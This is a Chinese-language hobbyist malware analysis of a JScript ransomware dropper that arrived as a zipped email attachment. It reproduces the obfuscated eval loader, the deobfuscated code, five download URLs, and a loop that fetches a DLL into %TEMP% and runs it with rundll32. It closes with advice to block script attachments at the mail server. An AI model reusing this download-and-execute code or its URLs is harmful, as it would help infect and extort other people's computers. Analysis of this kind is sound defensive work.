目前勒索病毒流行趨勢很火,一般勒索就是通過郵件、網站掛馬、adobe flash漏洞等方式感染計算機,下載指定的病毒程序,再感染整個計算機,加密。 
前天收到一份郵件,郵件地址來源陝西一台個人電腦,一看就是那種中了病毒,成了中繼場了。郵件內容看起來很正常,告訴我們的使用者,這個一個什麼什麼,請查收之類。 
附件是一個zip的壓縮包,裡面有個js文件。 
/*@cc_on 
var Xm = '\x4b'; 
var Nf = '\x4c'; 
var Bv = '\x3a'; 
var MQz = 'a'; 
var WCr = '\x3c'; 
var NSs = '\x3b'; 
var AQc = '\x3e'; 
var HJr = '\x3d'; 
var YVd = '\x44'; 
var Yw = '\x45'; 
var ELv = '\x46'; 
var OZb = '\x47'; 
............ 
 
 
var Zo = ""; 
var YNb = 0; 
do 
{ 
    Zo += Jo[YNb]; 
    YNb += 1; 
} while (YNb < Jo.length); 
eval(Zo); 
@*/ 
 
 
全程這種寫法,其實這都是障眼,\X表示是十六進制,在windows很多程序中是可以直接識別的,上面翻譯就對照ASCII編碼表就行。 
如果你很懶,想省力,就開個程序(我用的vs2015),跑一下,得出zo的字符串。 
function e(){ 
    var _hsiyudgfustdg = "WScript"; 
    var _c = "\%SystemRoot\%\\system32\\cmd.exe"; 
    /*@cc_on var _87867t67t6gt = this[_hsiyudgfustdg]["Cre"+"ateOb"+"ject"](_hsiyudgfustdg+".Shell"); @*/ 
    var _87g6sd5fg = _87867t67t6gt["Environment"]("SYSTEM"); 
    var _dd = _87g6sd5fg("ComSpec"); 
    if (_dd == _c) {return 1;} 
        else {this[this["_hsiyudgfustdg"]]["Quit"](1);}; 
} 
e(); 
var La = "join" + ""; 
var DGz = "de" + ""; 
var NSy = "Co" + ""; 
var BEs = "ar" + ""; 
var Hx = "mCh" + ""; 
var Sa = "fro" + ""; 
var Tz = "gth" + ""; 
var Vv = "len" + ""; 
var TJm = "e" + ""; 
var Wg3 = "clos" + ""; 
var Az4 = "e" + ""; 
var Vf = "oFil" + ""; 
var VXy = "SaveT" + ""; 
var Pp = "t" + ""; 
var NOs = "eTex" + ""; 
var Bc = "writ" + ""; 
 
................. 
 
跑出來的已經很好看了。至少有字符串了。它使用的就是vscript 宿主腳本語言,我們常說的vbs就是了 
找到關鍵地方,翻譯出:(後面就別隨便找程序來跑執行點了undefined) 
var IGv7=[Xw3+Ya+Yc + Kb6+SCv6+Tl3+KFg2+Ka6+Uo + OHi6+Ls4, ZCl + WBq+VKq + Sj3+SHj8 + Ch+Yy+Ac9+FKf3 + Pf+NZa2 + Fb9+Fb+Ke+JPy+Ey8, Hg6 + Sv+ATm5 + Xr1+Gs+IEl+UQk7+Pr+Kp0+EDr2+Cl, Hg6 + Sv+Cd+Zy+Pi4 + WXl+REi3+Ag + Oz0+Os+BYp2+Lf4, Hg6 + Sv+PKt2+Nc+LSk+Uu7+GPw+FOx8 + AUi+OPo+LTv + NGu8+Ne]; 
(其實這個IGv7是個數組來著) 
var IGv7="http://sjunne.net/rzxh3,http://taladcaraudio.com/shl9lzvq,http://thisedu.com/t87wg07,http://onmunrebut.com/24hydk,http://clempurry.net/2v9r9d" 
 
得到這幾個病毒下載器的網址。然後找到主執行程序:這基本上大家都可以看懂了。無非就是檢測有temp下面有沒有個指定的dll,沒有就去下載。然後用rundll32.exe 注入。 
for (var i = 0; i < 10; i = i + (-3782 + 3783)) 
{ 
        if (fso[FileExists](GLq)) 
        { 
                var Nf = fso.GetFile("%TEMP%/Hosm8A4XkHIfA.dll"); 
                var Nq = Nf.ShortPath; 
                El = Nq + ".txt"; 
                'if (fso[XHo2 + Bt + ICq](El)) {this[Ij2 + HOf][Hq + Hk7](0);} 
                if (fso[filesexists](El))  
                {this[WScript][quit](0);} 
        } 
 
        try 
        { 
                if ((-3868 + 3868) == Ww) 
                { 
                        var Gr = random(IGv7[lenthh], WBe); 
                         
                        MTm6[open](get, IGv7[Gr++ % IGv7[length]], false); 
                        MTm6[send](); 
                        while (MTm6.readystate < 4) WScript[sleep](100); 
                 
                        var Uv=WScript[CreateObject](Adodb.stream); 
                        Uv[open](); 
                        Uv[type]=XWe; 'xwe=1 
                        Uv[write](MTm6[responseBody]); 
                        Uv[position]=0; 
                        Uv[savetofile]("%TEMP%/Hosm8A4XkHIfA", 2); 
                        Uv[close](); 
         
                        var CJf2=HIi("TEMP%/Hosm8A4XkHIfA");                 
                        CJf2=Kx1(CJf2); 
                        if (CJf2[length] < (38 * 2 + 24) * 1024 || CJf2[length] > 230 * 1024) 
                        { 
                                continue; 
                        } 
                         
                        OMb(GLq, CJf2); 
                        Ww = 1; 
                } 
                 
                var Nf = fso.GetFile("%TEMP%/Hosm8A4XkHIfA.dll"); 
                var Nq = Nf.ShortPath; 
                MBi0[run](ELs + " " + Nq + ",qwerty 323"); 
                 
                 WScript.Sleep(13494 + 6506); 
        } 
        catch (e) {WScript[Sleep](1000); continue;}; 
} 
WScript.Quit(0); 
 
 
後面我就沒繼續了。以上純屬愛好。 
最好在郵件服務中屏蔽郵件附件中帶有.exe、wsf、vbs、ace、adom等腳本語言的內容,起到防範作用。 
 |  
  
 |